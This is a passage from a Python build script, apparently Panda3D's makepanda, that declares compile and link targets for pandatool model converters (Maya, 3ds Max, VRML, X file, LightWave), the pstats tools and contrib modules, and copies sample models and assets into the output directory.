if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/pfmprogs']
TargetAdd('pfm-trans_pfmTrans.obj', opts=OPTS, input='pfmTrans.cxx')
TargetAdd('pfm-trans.exe', input='pfm-trans_pfmTrans.obj')
TargetAdd('pfm-trans.exe', input='libp3progbase.lib')
TargetAdd('pfm-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('pfm-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pfm-trans.exe', opts=['ADVAPI'])
TargetAdd('pfm-bba_pfmBba.obj', opts=OPTS, input='pfmBba.cxx')
TargetAdd('pfm-bba_config_pfmprogs.obj', opts=OPTS, input='config_pfmprogs.cxx')
TargetAdd('pfm-bba.exe', input='pfm-bba_pfmBba.obj')
TargetAdd('pfm-bba.exe', input='pfm-bba_config_pfmprogs.obj')
TargetAdd('pfm-bba.exe', input='libp3progbase.lib')
TargetAdd('pfm-bba.exe', input='libp3pandatoolbase.lib')
TargetAdd('pfm-bba.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pfm-bba.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/lwo/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/lwo']
TargetAdd('p3lwo_composite1.obj', opts=OPTS, input='p3lwo_composite1.cxx')
TargetAdd('libp3lwo.lib', input='p3lwo_composite1.obj')
#
# DIRECTORY: pandatool/src/lwoegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/lwoegg']
TargetAdd('p3lwoegg_composite1.obj', opts=OPTS, input='p3lwoegg_composite1.cxx')
TargetAdd('libp3lwoegg.lib', input='p3lwoegg_composite1.obj')
#
# DIRECTORY: pandatool/src/lwoprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/lwoprogs', 'DIR:pandatool/src/lwo']
TargetAdd('lwo-scan_lwoScan.obj', opts=OPTS, input='lwoScan.cxx')
TargetAdd('lwo-scan.exe', input='lwo-scan_lwoScan.obj')
TargetAdd('lwo-scan.exe', input='libp3lwo.lib')
TargetAdd('lwo-scan.exe', input='libp3progbase.lib')
TargetAdd('lwo-scan.exe', input='libp3pandatoolbase.lib')
TargetAdd('lwo-scan.exe', input=COMMON_PANDA_LIBS)
TargetAdd('lwo-scan.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('lwo2egg_lwoToEgg.obj', opts=OPTS, input='lwoToEgg.cxx')
TargetAdd('lwo2egg.exe', input='lwo2egg_lwoToEgg.obj')
TargetAdd('lwo2egg.exe', input='libp3lwo.lib')
TargetAdd('lwo2egg.exe', input='libp3lwoegg.lib')
TargetAdd('lwo2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('lwo2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/maya/
#
for VER in MAYAVERSIONS:
VNUM=VER[4:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/maya', VER]
TargetAdd('maya'+VNUM+'_composite1.obj', opts=OPTS, input='p3maya_composite1.cxx')
TargetAdd('libmaya'+VNUM+'.lib', input='maya'+VNUM+'_composite1.obj')
#
# DIRECTORY: pandatool/src/mayaegg/
#
for VER in MAYAVERSIONS:
VNUM=VER[4:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/mayaegg', 'DIR:pandatool/src/maya', VER]
TargetAdd('mayaegg'+VNUM+'_loader.obj', opts=OPTS, input='mayaEggLoader.cxx')
TargetAdd('mayaegg'+VNUM+'_composite1.obj', opts=OPTS, input='p3mayaegg_composite1.cxx')
TargetAdd('libmayaegg'+VNUM+'.lib', input='mayaegg'+VNUM+'_loader.obj')
TargetAdd('libmayaegg'+VNUM+'.lib', input='mayaegg'+VNUM+'_composite1.obj')
#
# DIRECTORY: pandatool/src/maxegg/
#
for VER in MAXVERSIONS:
VNUM=VER[3:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/maxegg', VER, "WINCOMCTL", "WINCOMDLG", "WINUSER", "MSFORSCOPE", "RTTI"]
TargetAdd('maxEgg'+VNUM+'.res', opts=OPTS, input='maxEgg.rc')
TargetAdd('maxegg'+VNUM+'_loader.obj', opts=OPTS, input='maxEggLoader.cxx')
TargetAdd('maxegg'+VNUM+'_composite1.obj', opts=OPTS, input='p3maxegg_composite1.cxx')
TargetAdd('maxegg'+VNUM+'.dlo', input='maxegg'+VNUM+'_composite1.obj')
TargetAdd('maxegg'+VNUM+'.dlo', input='maxEgg'+VNUM+'.res')
TargetAdd('maxegg'+VNUM+'.dlo', input='maxEgg.def', ipath=OPTS)
TargetAdd('maxegg'+VNUM+'.dlo', input=COMMON_EGG2X_LIBS)
TargetAdd('maxegg'+VNUM+'.dlo', opts=OPTS)
#
# DIRECTORY: pandatool/src/maxprogs/
#
for VER in MAXVERSIONS:
VNUM=VER[3:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/maxprogs', VER, "WINCOMCTL", "WINCOMDLG", "WINUSER", "MSFORSCOPE", "RTTI"]
TargetAdd('maxImportRes.res', opts=OPTS, input='maxImportRes.rc')
TargetAdd('maxprogs'+VNUM+'_maxeggimport.obj', opts=OPTS, input='maxEggImport.cxx')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxegg'+VNUM+'_loader.obj')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxprogs'+VNUM+'_maxeggimport.obj')
TargetAdd('maxeggimport'+VNUM+'.dle', input='libpandaegg.dll')
TargetAdd('maxeggimport'+VNUM+'.dle', input='libpanda.dll')
TargetAdd('maxeggimport'+VNUM+'.dle', input='libpandaexpress.dll')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxImportRes.res')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxEggImport.def', ipath=OPTS)
TargetAdd('maxeggimport'+VNUM+'.dle', input=COMMON_DTOOL_LIBS)
TargetAdd('maxeggimport'+VNUM+'.dle', opts=OPTS)
#
# DIRECTORY: pandatool/src/vrml/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/vrml', 'ZLIB', 'BISONPREFIX_vrmlyy']
CreateFile(GetOutputDir()+"/include/vrmlParser.h")
TargetAdd('p3vrml_vrmlParser.obj', opts=OPTS, input='vrmlParser.yxx')
TargetAdd('vrmlParser.h', input='p3vrml_vrmlParser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3vrml_vrmlLexer.obj', opts=OPTS, input='vrmlLexer.lxx')
TargetAdd('p3vrml_parse_vrml.obj', opts=OPTS, input='parse_vrml.cxx')
TargetAdd('p3vrml_standard_nodes.obj', opts=OPTS, input='standard_nodes.cxx')
TargetAdd('p3vrml_vrmlNode.obj', opts=OPTS, input='vrmlNode.cxx')
TargetAdd('p3vrml_vrmlNodeType.obj', opts=OPTS, input='vrmlNodeType.cxx')
TargetAdd('libp3vrml.lib', input='p3vrml_parse_vrml.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_standard_nodes.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlNode.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlNodeType.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlParser.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlLexer.obj')
#
# DIRECTORY: pandatool/src/vrmlegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/vrmlegg', 'DIR:pandatool/src/vrml']
TargetAdd('p3vrmlegg_indexedFaceSet.obj', opts=OPTS, input='indexedFaceSet.cxx')
TargetAdd('p3vrmlegg_vrmlAppearance.obj', opts=OPTS, input='vrmlAppearance.cxx')
TargetAdd('p3vrmlegg_vrmlToEggConverter.obj', opts=OPTS, input='vrmlToEggConverter.cxx')
TargetAdd('libp3vrmlegg.lib', input='p3vrmlegg_indexedFaceSet.obj')
TargetAdd('libp3vrmlegg.lib', input='p3vrmlegg_vrmlAppearance.obj')
TargetAdd('libp3vrmlegg.lib', input='p3vrmlegg_vrmlToEggConverter.obj')
#
# DIRECTORY: pandatool/src/xfile/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/xfile', 'ZLIB', 'BISONPREFIX_xyy', 'FLEXDASHI']
CreateFile(GetOutputDir()+"/include/xParser.h")
TargetAdd('p3xfile_xParser.obj', opts=OPTS, input='xParser.yxx')
TargetAdd('xParser.h', input='p3xfile_xParser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3xfile_xLexer.obj', opts=OPTS, input='xLexer.lxx')
TargetAdd('p3xfile_composite1.obj', opts=OPTS, input='p3xfile_composite1.cxx')
TargetAdd('libp3xfile.lib', input='p3xfile_composite1.obj')
TargetAdd('libp3xfile.lib', input='p3xfile_xParser.obj')
TargetAdd('libp3xfile.lib', input='p3xfile_xLexer.obj')
#
# DIRECTORY: pandatool/src/xfileegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/xfileegg', 'DIR:pandatool/src/xfile']
TargetAdd('p3xfileegg_composite1.obj', opts=OPTS, input='p3xfileegg_composite1.cxx')
TargetAdd('libp3xfileegg.lib', input='p3xfileegg_composite1.obj')
#
# DIRECTORY: pandatool/src/ptloader/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
if not PkgSkip("FCOLLADA"):
DefSymbol("FCOLLADA", "HAVE_FCOLLADA")
OPTS=['DIR:pandatool/src/ptloader', 'DIR:pandatool/src/flt', 'DIR:pandatool/src/lwo', 'DIR:pandatool/src/xfile', 'DIR:pandatool/src/xfileegg', 'DIR:pandatool/src/daeegg', 'BUILDING:PTLOADER', 'FCOLLADA']
TargetAdd('p3ptloader_config_ptloader.obj', opts=OPTS, input='config_ptloader.cxx', dep='dtool_have_fcollada.dat')
TargetAdd('p3ptloader_loaderFileTypePandatool.obj', opts=OPTS, input='loaderFileTypePandatool.cxx')
TargetAdd('libp3ptloader.dll', input='p3ptloader_config_ptloader.obj')
TargetAdd('libp3ptloader.dll', input='p3ptloader_loaderFileTypePandatool.obj')
TargetAdd('libp3ptloader.dll', input='libp3fltegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3flt.lib')
TargetAdd('libp3ptloader.dll', input='libp3lwoegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3lwo.lib')
TargetAdd('libp3ptloader.dll', input='libp3dxfegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3dxf.lib')
TargetAdd('libp3ptloader.dll', input='libp3objegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3vrmlegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3vrml.lib')
TargetAdd('libp3ptloader.dll', input='libp3xfileegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3xfile.lib')
if (PkgSkip("FCOLLADA")==0): TargetAdd('libp3ptloader.dll', input='libp3daeegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3eggbase.lib')
TargetAdd('libp3ptloader.dll', input='libp3progbase.lib')
TargetAdd('libp3ptloader.dll', input='libp3converter.lib')
TargetAdd('libp3ptloader.dll', input='libp3pandatoolbase.lib')
TargetAdd('libp3ptloader.dll', input='libpandaegg.dll')
TargetAdd('libp3ptloader.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3ptloader.dll', opts=['MODULE', 'ADVAPI', 'FCOLLADA', 'WINUSER'])
#
# DIRECTORY: pandatool/src/miscprogs/
#
# This is a bit of an esoteric tool, and it causes issues because
# it conflicts with tools of the same name in different packages.
#if (PkgSkip("PANDATOOL")==0):
# OPTS=['DIR:pandatool/src/miscprogs']
# TargetAdd('bin2c_binToC.obj', opts=OPTS, input='binToC.cxx')
# TargetAdd('bin2c.exe', input='bin2c_binToC.obj')
# TargetAdd('bin2c.exe', input='libp3progbase.lib')
# TargetAdd('bin2c.exe', input='libp3pandatoolbase.lib')
# TargetAdd('bin2c.exe', input=COMMON_PANDA_LIBS)
# TargetAdd('bin2c.exe', input='libp3pystub.lib')
# TargetAdd('bin2c.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/pstatserver/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/pstatserver']
TargetAdd('p3pstatserver_composite1.obj', opts=OPTS, input='p3pstatserver_composite1.cxx')
TargetAdd('libp3pstatserver.lib', input='p3pstatserver_composite1.obj')
#
# DIRECTORY: pandatool/src/softprogs/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/softprogs', 'OPENSSL']
TargetAdd('softcvs_softCVS.obj', opts=OPTS, input='softCVS.cxx')
TargetAdd('softcvs_softFilename.obj', opts=OPTS, input='softFilename.cxx')
TargetAdd('softcvs.exe', input='softcvs_softCVS.obj')
TargetAdd('softcvs.exe', input='softcvs_softFilename.obj')
TargetAdd('softcvs.exe', input='libp3progbase.lib')
TargetAdd('softcvs.exe', input='libp3pandatoolbase.lib')
TargetAdd('softcvs.exe', input=COMMON_PANDA_LIBS)
TargetAdd('softcvs.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/text-stats/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/text-stats']
TargetAdd('text-stats_textMonitor.obj', opts=OPTS, input='textMonitor.cxx')
TargetAdd('text-stats_textStats.obj', opts=OPTS, input='textStats.cxx')
TargetAdd('text-stats.exe', input='text-stats_textMonitor.obj')
TargetAdd('text-stats.exe', input='text-stats_textStats.obj')
TargetAdd('text-stats.exe', input='libp3progbase.lib')
TargetAdd('text-stats.exe', input='libp3pstatserver.lib')
TargetAdd('text-stats.exe', input='libp3pandatoolbase.lib')
TargetAdd('text-stats.exe', input=COMMON_PANDA_LIBS)
TargetAdd('text-stats.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/vrmlprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/vrmlprogs', 'DIR:pandatool/src/vrml', 'DIR:pandatool/src/vrmlegg']
TargetAdd('vrml-trans_vrmlTrans.obj', opts=OPTS, input='vrmlTrans.cxx')
TargetAdd('vrml-trans.exe', input='vrml-trans_vrmlTrans.obj')
TargetAdd('vrml-trans.exe', input='libp3vrml.lib')
TargetAdd('vrml-trans.exe', input='libp3progbase.lib')
TargetAdd('vrml-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('vrml-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('vrml-trans.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('vrml2egg_vrmlToEgg.obj', opts=OPTS, input='vrmlToEgg.cxx')
TargetAdd('vrml2egg.exe', input='vrml2egg_vrmlToEgg.obj')
TargetAdd('vrml2egg.exe', input='libp3vrmlegg.lib')
TargetAdd('vrml2egg.exe', input='libp3vrml.lib')
TargetAdd('vrml2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('vrml2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/win-stats/
# DIRECTORY: pandatool/src/gtk-stats/
#
if (PkgSkip("PANDATOOL")==0 and (GetTarget() == 'windows' or PkgSkip("GTK2")==0)):
if GetTarget() == 'windows':
OPTS=['DIR:pandatool/src/win-stats']
TargetAdd('pstats_composite1.obj', opts=OPTS, input='winstats_composite1.cxx')
else:
OPTS=['DIR:pandatool/src/gtk-stats', 'GTK2']
TargetAdd('pstats_composite1.obj', opts=OPTS, input='gtkstats_composite1.cxx')
TargetAdd('pstats.exe', input='pstats_composite1.obj')
TargetAdd('pstats.exe', input='libp3pstatserver.lib')
TargetAdd('pstats.exe', input='libp3progbase.lib')
TargetAdd('pstats.exe', input='libp3pandatoolbase.lib')
TargetAdd('pstats.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pstats.exe', opts=['SUBSYSTEM:WINDOWS', 'WINSOCK', 'WINIMM', 'WINGDI', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM', 'GTK2'])
#
# DIRECTORY: pandatool/src/xfileprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/xfileprogs', 'DIR:pandatool/src/xfile', 'DIR:pandatool/src/xfileegg']
TargetAdd('x-trans_xFileTrans.obj', opts=OPTS, input='xFileTrans.cxx')
TargetAdd('x-trans.exe', input='x-trans_xFileTrans.obj')
TargetAdd('x-trans.exe', input='libp3progbase.lib')
TargetAdd('x-trans.exe', input='libp3xfile.lib')
TargetAdd('x-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('x-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('x-trans.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('egg2x_eggToX.obj', opts=OPTS, input='eggToX.cxx')
TargetAdd('egg2x.exe', input='egg2x_eggToX.obj')
TargetAdd('egg2x.exe', input='libp3xfileegg.lib')
TargetAdd('egg2x.exe', input='libp3xfile.lib')
TargetAdd('egg2x.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2x.exe', opts=['ADVAPI'])
TargetAdd('x2egg_xFileToEgg.obj', opts=OPTS, input='xFileToEgg.cxx')
TargetAdd('x2egg.exe', input='x2egg_xFileToEgg.obj')
TargetAdd('x2egg.exe', input='libp3xfileegg.lib')
TargetAdd('x2egg.exe', input='libp3xfile.lib')
TargetAdd('x2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('x2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/mayaprogs/
#
for VER in MAYAVERSIONS:
VNUM = VER[4:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
if GetTarget() == 'darwin' and int(VNUM) >= 2012:
ARCH_OPTS = ['NOARCH:PPC', 'NOARCH:I386']
if len(OSX_ARCHS) != 0 and 'x86_64' not in OSX_ARCHS:
continue
elif GetTarget() == 'darwin' and int(VNUM) >= 2009:
ARCH_OPTS = ['NOARCH:PPC']
elif GetTarget() == 'darwin':
ARCH_OPTS = ['NOARCH:X86_64']
else:
ARCH_OPTS = []
OPTS=['DIR:pandatool/src/mayaprogs', 'DIR:pandatool/src/maya', 'DIR:pandatool/src/mayaegg', 'DIR:pandatool/src/cvscopy', 'BUILDING:MISC', VER] + ARCH_OPTS
TargetAdd('mayaeggimport'+VNUM+'_mayaeggimport.obj', opts=OPTS, input='mayaEggImport.cxx')
TargetAdd('mayaeggimport'+VNUM+'.mll', input='mayaegg'+VNUM+'_loader.obj')
TargetAdd('mayaeggimport'+VNUM+'.mll', input='mayaeggimport'+VNUM+'_mayaeggimport.obj')
TargetAdd('mayaeggimport'+VNUM+'.mll', input='libpandaegg.dll')
TargetAdd('mayaeggimport'+VNUM+'.mll', input=COMMON_PANDA_LIBS)
#if GetTarget() == 'windows':
# TargetAdd('mayaeggimport'+VNUM+'.mll', input='libp3pystub.lib')
TargetAdd('mayaeggimport'+VNUM+'.mll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayaloader'+VNUM+'_config_mayaloader.obj', opts=OPTS, input='config_mayaloader.cxx')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='mayaloader'+VNUM+'_config_mayaloader.obj')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libmayaegg'+VNUM+'.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3ptloader.dll')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libmaya'+VNUM+'.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3fltegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3flt.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3lwoegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3lwo.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3dxfegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3dxf.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3objegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3vrmlegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3vrml.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3xfileegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3xfile.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3eggbase.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3progbase.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3converter.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3pandatoolbase.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libpandaegg.dll')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3mayaloader'+VNUM+'.dll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayapview'+VNUM+'_mayaPview.obj', opts=OPTS, input='mayaPview.cxx')
TargetAdd('libmayapview'+VNUM+'.mll', input='mayapview'+VNUM+'_mayaPview.obj')
TargetAdd('libmayapview'+VNUM+'.mll', input='libmayaegg'+VNUM+'.lib')
TargetAdd('libmayapview'+VNUM+'.mll', input='libmaya'+VNUM+'.lib')
TargetAdd('libmayapview'+VNUM+'.mll', input='libp3framework.dll')
if GetTarget() == 'windows':
TargetAdd('libmayapview'+VNUM+'.mll', input=COMMON_EGG2X_LIBS)
else:
TargetAdd('libmayapview'+VNUM+'.mll', input=COMMON_EGG2X_LIBS)
TargetAdd('libmayapview'+VNUM+'.mll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('maya2egg'+VNUM+'_mayaToEgg.obj', opts=OPTS, input='mayaToEgg.cxx')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input='maya2egg'+VNUM+'_mayaToEgg.obj')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input='libmayaegg'+VNUM+'.lib')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input='libmaya'+VNUM+'.lib')
if GetTarget() == 'windows':
TargetAdd('maya2egg'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
else:
TargetAdd('maya2egg'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('maya2egg'+VNUM+'_bin.exe', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('egg2maya'+VNUM+'_eggToMaya.obj', opts=OPTS, input='eggToMaya.cxx')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input='egg2maya'+VNUM+'_eggToMaya.obj')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input='libmayaegg'+VNUM+'.lib')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input='libmaya'+VNUM+'.lib')
if GetTarget() == 'windows':
TargetAdd('egg2maya'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
else:
TargetAdd('egg2maya'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2maya'+VNUM+'_bin.exe', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayacopy'+VNUM+'_mayaCopy.obj', opts=OPTS, input='mayaCopy.cxx')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input='mayacopy'+VNUM+'_mayaCopy.obj')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input='libp3cvscopy.lib')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input='libmaya'+VNUM+'.lib')
if GetTarget() == 'windows':
TargetAdd('mayacopy'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
else:
TargetAdd('mayacopy'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('mayacopy'+VNUM+'_bin.exe', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayasavepview'+VNUM+'_mayaSavePview.obj', opts=OPTS, input='mayaSavePview.cxx')
TargetAdd('libmayasavepview'+VNUM+'.mll', input='mayasavepview'+VNUM+'_mayaSavePview.obj')
TargetAdd('libmayasavepview'+VNUM+'.mll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayapath'+VNUM+'.obj', opts=OPTS, input='mayapath.cxx')
TargetAdd('maya2egg'+VNUM+'.exe', input='mayapath'+VNUM+'.obj')
TargetAdd('maya2egg'+VNUM+'.exe', input='libpandaexpress.dll')
TargetAdd('maya2egg'+VNUM+'.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('maya2egg'+VNUM+'.exe', opts=['ADVAPI']+ARCH_OPTS)
TargetAdd('egg2maya'+VNUM+'.exe', input='mayapath'+VNUM+'.obj')
TargetAdd('egg2maya'+VNUM+'.exe', input='libpandaexpress.dll')
TargetAdd('egg2maya'+VNUM+'.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('egg2maya'+VNUM+'.exe', opts=['ADVAPI']+ARCH_OPTS)
TargetAdd('mayacopy'+VNUM+'.exe', input='mayapath'+VNUM+'.obj')
TargetAdd('mayacopy'+VNUM+'.exe', input='libpandaexpress.dll')
TargetAdd('mayacopy'+VNUM+'.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('mayacopy'+VNUM+'.exe', opts=['ADVAPI']+ARCH_OPTS)
#
# DIRECTORY: contrib/src/ai/
#
if (PkgSkip("CONTRIB")==0 and not RUNTIME):
OPTS=['DIR:contrib/src/ai', 'BUILDING:PANDAAI']
TargetAdd('p3ai_composite1.obj', opts=OPTS, input='p3ai_composite1.cxx')
TargetAdd('libpandaai.dll', input='p3ai_composite1.obj')
TargetAdd('libpandaai.dll', input=COMMON_PANDA_LIBS)
OPTS=['DIR:contrib/src/ai', 'PYTHON']
IGATEFILES=GetDirectoryContents('contrib/src/ai', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandaai.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaai.in', opts=['IMOD:panda3d.ai', 'ILIB:libpandaai', 'SRCDIR:contrib/src/ai'])
TargetAdd('libpandaai_igate.obj', input='libpandaai.in', opts=["DEPENDENCYONLY"])
TargetAdd('ai_module.obj', input='libpandaai.in')
TargetAdd('ai_module.obj', opts=OPTS)
TargetAdd('ai_module.obj', opts=['IMOD:panda3d.ai', 'ILIB:ai', 'IMPORT:panda3d.core'])
TargetAdd('ai.pyd', input='ai_module.obj')
TargetAdd('ai.pyd', input='libpandaai_igate.obj')
TargetAdd('ai.pyd', input='libpandaai.dll')
TargetAdd('ai.pyd', input='libp3interrogatedb.dll')
TargetAdd('ai.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('ai.pyd', opts=['PYTHON'])
#
# DIRECTORY: contrib/src/rplight/
#
if not PkgSkip("CONTRIB") and not PkgSkip("PYTHON") and not RUNTIME:
OPTS=['DIR:contrib/src/rplight', 'BUILDING:RPLIGHT', 'PYTHON']
TargetAdd('p3rplight_composite1.obj', opts=OPTS, input='p3rplight_composite1.cxx')
IGATEFILES=GetDirectoryContents('contrib/src/rplight', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3rplight.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3rplight.in', opts=['IMOD:panda3d._rplight', 'ILIB:libp3rplight', 'SRCDIR:contrib/src/rplight'])
TargetAdd('libp3rplight_igate.obj', input='libp3rplight.in', opts=["DEPENDENCYONLY"])
TargetAdd('rplight_module.obj', input='libp3rplight.in')
TargetAdd('rplight_module.obj', opts=OPTS)
TargetAdd('rplight_module.obj', opts=['IMOD:panda3d._rplight', 'ILIB:_rplight', 'IMPORT:panda3d.core'])
TargetAdd('_rplight.pyd', input='rplight_module.obj')
TargetAdd('_rplight.pyd', input='libp3rplight_igate.obj')
TargetAdd('_rplight.pyd', input='p3rplight_composite1.obj')
TargetAdd('_rplight.pyd', input='libp3interrogatedb.dll')
TargetAdd('_rplight.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('_rplight.pyd', opts=['PYTHON'])
#
# Generate the models directory and samples directory
#
if not PkgSkip("DIRECT") and not RUNTIME and not PkgSkip("EGG"):
model_extensions = ["*.egg"]
# Check if we have access to an flt2egg utility, either self-compiled or on the system.
if ((PkgSkip("PANDATOOL")==0 and GetHost()==GetTarget()) or LocateBinary('flt2egg')):
model_extensions.append("*.flt")
for model in GetDirectoryContents("dmodels/src/misc", model_extensions):
if (PkgSkip("ZLIB")==0 and PkgSkip("DEPLOYTOOLS")==0 and not RTDIST):
newname = model[:-4] + ".egg.pz"
else:
newname = model[:-4] + ".egg"
TargetAdd(GetOutputDir()+"/models/misc/"+newname, input="dmodels/src/misc/"+model)
for model in GetDirectoryContents("dmodels/src/gui", model_extensions):
if (PkgSkip("ZLIB")==0 and PkgSkip("DEPLOYTOOLS")==0 and not RTDIST):
newname = model[:-4] + ".egg.pz"
else:
newname = model[:-4] + ".egg"
TargetAdd(GetOutputDir()+"/models/gui/"+newname, input="dmodels/src/gui/"+model)
for model in GetDirectoryContents("models", model_extensions):
if (PkgSkip("ZLIB")==0 and PkgSkip("DEPLOYTOOLS")==0 and not RTDIST):
newname = model[:-4] + ".egg.pz"
else:
newname = model[:-4] + ".egg"
TargetAdd(GetOutputDir()+"/models/"+newname, input="models/"+model)
if not PkgSkip("DIRECT") and not RUNTIME:
CopyAllFiles(GetOutputDir()+"/models/audio/sfx/", "dmodels/src/audio/sfx/", ".wav")
CopyAllFiles(GetOutputDir()+"/models/icons/", "dmodels/src/icons/", ".gif")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".jpg")
